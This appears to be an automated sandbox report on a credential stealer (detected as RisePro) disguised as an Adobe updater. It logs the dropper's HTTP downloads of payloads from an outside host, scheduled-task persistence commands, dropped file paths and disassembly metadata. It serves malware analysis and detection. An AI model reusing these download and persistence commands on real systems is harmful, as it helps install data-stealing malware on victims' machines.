Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 23:01:53.959652901 CEST	192.168.2.4	1.1.1.1	0xf6	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 23:01:54.063004017 CEST	1.1.1.1	192.168.2.4	0xf6	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.221.84.105	799	6568	C:\Users\user\AppData\Local\Temp\xRp.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 23:01:54.074652910 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	44.221.84.105	799	6568	C:\Users\user\AppData\Local\Temp\xRp.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 23:01:58.838676929 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49748	44.221.84.105	799	8120	C:\Users\user\AppData\Local\Temp\xRp.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 23:02:17.872765064 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49749	44.221.84.105	799	8120	C:\Users\user\AppData\Local\Temp\xRp.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 23:02:20.546958923 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49751	44.221.84.105	799	8120	C:\Users\user\AppData\Local\Temp\xRp.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 23:02:23.211795092 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49752	44.221.84.105	799	8120	C:\Users\user\AppData\Local\Temp\xRp.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 23:02:26.419012070 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49753	44.221.84.105	799	8120	C:\Users\user\AppData\Local\Temp\xRp.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 23:02:29.901801109 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	17:01:52
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\AdobeUpdaterV131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AdobeUpdaterV131.exe"
Imagebase:	0x620000
File size:	2'342'912 bytes
MD5 hash:	0BFB030DCBF461F2C76087E4B9856836
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	17:01:53
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\xRp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\xRp.exe
Imagebase:	0x4e0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:01:58
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xa10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:01:58
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:01:58
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xa10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:01:58
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:01:58
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776
Imagebase:	0x8f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:02:00
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0xab0000
File size:	2'342'912 bytes
MD5 hash:	0BFB030DCBF461F2C76087E4B9856836
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	17:02:00
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0xab0000
File size:	2'342'912 bytes
MD5 hash:	0BFB030DCBF461F2C76087E4B9856836
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	17:02:08
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Imagebase:	0x5c0000
File size:	2'342'912 bytes
MD5 hash:	0BFB030DCBF461F2C76087E4B9856836
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	17:02:16
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Imagebase:	0x5c0000
File size:	2'342'912 bytes
MD5 hash:	0BFB030DCBF461F2C76087E4B9856836
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	17:02:16
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\xRp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\xRp.exe
Imagebase:	0xe30000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:02:32
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:02:33
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	16.7%
Total number of Nodes:	114
Total number of Limit Nodes:	16

Executed Functions

Function 00BC0044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00BC0223
WriteFile.KERNEL32(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00BC0252
FindCloseChangeNotification.KERNEL32(00000000), ref: 00BC0256
WinExec.KERNEL32(?,00000005), ref: 00BC0262

Strings

el32, xrefs: 00BC00FB
.dll, xrefs: 00BC0102
Writ, xrefs: 00BC0148
WinE, xrefs: 00BC0110
dleA, xrefs: 00BC00D0
odul, xrefs: 00BC022D
Clos, xrefs: 00BC0129
GetT, xrefs: 00BC0188
Kern, xrefs: 00BC00F4
athA, xrefs: 00BC0199
Crea, xrefs: 00BC0169
catA, xrefs: 00BC01AF
GetM, xrefs: 00BC00B6
lstr, xrefs: 00BC01A7
xRp.exe, xrefs: 00BC01FD, 00BC0200

Memory Dump Source

Source File: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
API String ID: 2234911746-2378254480
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: e8bd36f115aa899849c8b62be6b843099b28442873e0a4873d501adb9aa5b292
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 3261E274D2121ADBCF249F94C884BADF7B4FB58715F2982AEE505AA241C3709A81CB91

Function 0063D620 Relevance: 6.1, APIs: 4, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0063D64B
socket.WS2_32(?,?,?,?,?,?,007550C8,?,?), ref: 0063D6EE
connect.WS2_32(00000000,?,?,?,?,?,007550C8,?,?), ref: 0063D702
closesocket.WS2_32(00000000), ref: 0063D70D

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID:
API String ID: 3098855095-0
Opcode ID: ca0057f3b823f61217a48d211b3d277889b9d02b506460293c2b691422b7756d
Instruction ID: 80a101af38c1b492a24baacb72c5f4b17959a65132e35cd08d9e950fa586f592
Opcode Fuzzy Hash: ca0057f3b823f61217a48d211b3d277889b9d02b506460293c2b691422b7756d
Instruction Fuzzy Hash: 6231D5715053115BD7209F249C84AAFB7E6FFCA378F101F1AF8E8A22D0D335991486E2

Function 04F1074F Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 02be77d5f0012411e1f61bb45b8988f9fca6c0d524ad3a21e7801ab8ff17e3b8
Instruction ID: 06fd8eb81c0e330b4e8d42fe3d4577f51ffb1eceb5dbb4503986610a08eb0dae
Opcode Fuzzy Hash: 02be77d5f0012411e1f61bb45b8988f9fca6c0d524ad3a21e7801ab8ff17e3b8
Instruction Fuzzy Hash: 3631E1E734C115BDB11281811B60AF66A6EE79B3707704072F507DAA62FED46ACB3531

Function 04F1041A Relevance: 1.9, APIs: 1, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e453fa11d17ab41b692ae4eee573ef7adc277bb6109dfbde1beb91efcbedd238
Instruction ID: ad09001feb242e9783e2d3894ed928cf086158f57486f215f34c68e17ca28834
Opcode Fuzzy Hash: e453fa11d17ab41b692ae4eee573ef7adc277bb6109dfbde1beb91efcbedd238
Instruction Fuzzy Hash: 8F9118E730C215BDB202C5855B64AFA6B6DE7DB730730847BF407C6922FA946ACB6131

Function 04F10453 Relevance: 1.9, APIs: 1, Instructions: 412
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4025c7b28cd821f5897860fcd44a481fbe04768f51f7e844b118d01865b64332
Instruction ID: 43bed273ed5879c9d4bc6965fe30ce56016ed37adb1251e99ea6aa4cd3d49601
Opcode Fuzzy Hash: 4025c7b28cd821f5897860fcd44a481fbe04768f51f7e844b118d01865b64332
Instruction Fuzzy Hash: 9881C2EB30C115BDB102C1852B64AFA676EE7DB7307308437F407D6922FA946ACB6531

Function 04F104A2 Relevance: 1.9, APIs: 1, Instructions: 402
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25bcc2b2cd6a337d2f0ae05da2cf93b40f30fe4197d0cbf4eb19f7b7d0fa1ecb
Instruction ID: 55af7d99458098372131bc9f2cd96c84792213869986ef50a7dbd945f170b580
Opcode Fuzzy Hash: 25bcc2b2cd6a337d2f0ae05da2cf93b40f30fe4197d0cbf4eb19f7b7d0fa1ecb
Instruction Fuzzy Hash: 9181B0EB20C115BDB102C1856B60AFA676EE7DA7307308437F407D6962FA946ACB6531

Function 04F10518 Relevance: 1.8, APIs: 1, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a3e5c179073b18b6ab123c9f3e2de02e3a48fe7f91ea563f7c72a22f443332
Instruction ID: 3cc08eb498ce7fa4c03c48c49931705556d4d1aafcf3b95b1c359b50c5d70c2d
Opcode Fuzzy Hash: c3a3e5c179073b18b6ab123c9f3e2de02e3a48fe7f91ea563f7c72a22f443332
Instruction Fuzzy Hash: 3761F3EB30C115BDB20281851B60AF6676EE7DB3707308437F407DAA22FA946ACB7531

Function 04F10503 Relevance: 1.8, APIs: 1, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947627f75041be7743804ec5ee348df60a057a63c6fdb9c04706f5cd80b0e930
Instruction ID: d41d3a0512371f2119e0a29db3d3798d269d9f754a36e77ae70dfeee60898090
Opcode Fuzzy Hash: 947627f75041be7743804ec5ee348df60a057a63c6fdb9c04706f5cd80b0e930
Instruction Fuzzy Hash: 306104EB30C215BDB20281551B50AFA676EE7DB3707308437F407D6A22FA946ACB7531

Function 04F10521 Relevance: 1.8, APIs: 1, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0224aea360bf4068b6f9ad5a57b68901e123819ecabd623c34c46caa8da86c0
Instruction ID: 657ca6c24cc3a8585cd5d8a519a9c71da736f56573bf5feb636230a3f95df585
Opcode Fuzzy Hash: d0224aea360bf4068b6f9ad5a57b68901e123819ecabd623c34c46caa8da86c0
Instruction Fuzzy Hash: 9061F2EB30C115BDB20281855B64AFA676EE7DB3307308437F407D6A22FA946ACB7531

Function 04F1055C Relevance: 1.8, APIs: 1, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: d5b60d67286c137c9a3a32a85bb11387813a2294b47d3edfa8ab23491f59aa33
Instruction ID: 05c9a3c47d35e6e928c860b7e25d3b3f8740b30b01dda8ef486ec41e89e75934
Opcode Fuzzy Hash: d5b60d67286c137c9a3a32a85bb11387813a2294b47d3edfa8ab23491f59aa33
Instruction Fuzzy Hash: C951E1EB30C115BDB10290455B60AF6666EE7DB3307308036F407D6A22FE946ACB7531

Function 04F10582 Relevance: 1.8, APIs: 1, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1fec6d438effa44d0c186b10e2d0575c556899054f963e8c9d90d74be4b862
Instruction ID: 5d4f9fdc6074dcf2e9bb311677239d5287dd22399115f6b7ea6df04fcfb91fc8
Opcode Fuzzy Hash: 2f1fec6d438effa44d0c186b10e2d0575c556899054f963e8c9d90d74be4b862
Instruction Fuzzy Hash: 1151EFEB30C125BDB10290455B64AFA666EE7DA3707308037F407D6A21FE946ACB7531

Function 04F105DC Relevance: 1.8, APIs: 1, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25db79dfcb4f327049e67d4aa396909095f03306715f145c3ab49d7708a2f36b
Instruction ID: b794d4ad1971fd2350399ed632b4aee4160d52ff210e8c6e37a5f247f778198b
Opcode Fuzzy Hash: 25db79dfcb4f327049e67d4aa396909095f03306715f145c3ab49d7708a2f36b
Instruction Fuzzy Hash: 385123EB30C115BDB20285515B60AFA6B6EE7D6330B308437F407D6A22FE946ACB7531

Function 04F1059E Relevance: 1.8, APIs: 1, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: dcb5a43d465f5275ac41b283016f314bdf8ccac0f957deb67496d3523f2b95c5
Instruction ID: 2777a0193eb276f111e1965dd3a6eb8b7b0e885df2f58e211a3469aa27b25ffe
Opcode Fuzzy Hash: dcb5a43d465f5275ac41b283016f314bdf8ccac0f957deb67496d3523f2b95c5
Instruction Fuzzy Hash: CE5102EB30C115BDB212D0415B60AFA666EE7DA370B308437F407D6A62FE946ACB3531

Function 04F105C5 Relevance: 1.8, APIs: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

